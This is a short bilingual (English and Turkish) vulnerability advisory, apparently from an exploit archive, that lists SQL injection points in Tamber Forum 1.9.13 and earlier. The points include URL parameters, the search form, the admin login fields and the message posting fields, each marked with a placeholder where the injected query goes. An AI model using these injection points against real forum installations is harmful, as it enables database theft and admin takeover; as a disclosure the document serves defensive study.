Tamber Forum <= 1.9.13 Multiple SQL Injection Vulnerabilities

ENGLISH

# Title  :   Tamber Forum <= 1.9.13 Multiple SQL Injection Vulnerabilities

# Author :   ajann

# Exploit;

SQL INJECT&#304;ON--------------------------------------------------------

###http://[target]/[path]/show_forum.asp?frm_id=55'SQL TEXT

###http://[target]/[path]/forum_search.asp SEARCH FOR:SQL TEXT

###http://[target]/[path]/admin/index.asp

Email address: 	SQL TEXT

Password: SQLTEXT

###http://[target]/[path]/browse_forum_cat.asp?frm_cat_id=1 SQL TEXT

###post_message.asp

Message Subject: SQL TEXT

Message Text: SQL TEXT

.

..

.....

# ajann,Turkey

TURKISH

# Basl&#305;k          :   Tamber Forum <= 1.9.13 Multiple SQL Injection Vulnerabilities

# A&#305;&#287;&#305; Bulan     :   ajann

# A&#305;k bulunan dosyalar;

###http://[target]/[path]/show_forum.asp?frm_id=55'SQL SORGUNUZ

###http://[target]/[path]/forum_search.asp SEARCH FOR:SQL SORGUNUZ

###http://[target]/[path]/admin/index.asp

Email address: 	SORGUNUZ

Password: SORGUNUZ

###http://[target]/[path]/browse_forum_cat.asp?frm_cat_id=1 SQL SORGUNUZ

###post_message.asp

Message Subject: SORGUNUZ

Message Text: SORGUNUZ

.

..

.....

Ac&#305;klama:

K&#305;sacas&#305; btn dosyalarda : ) bulunan filtrelem eksikli&#287;i nedeniyle dbden bilgi cekilebilmektedir.

# ajann,Turkiye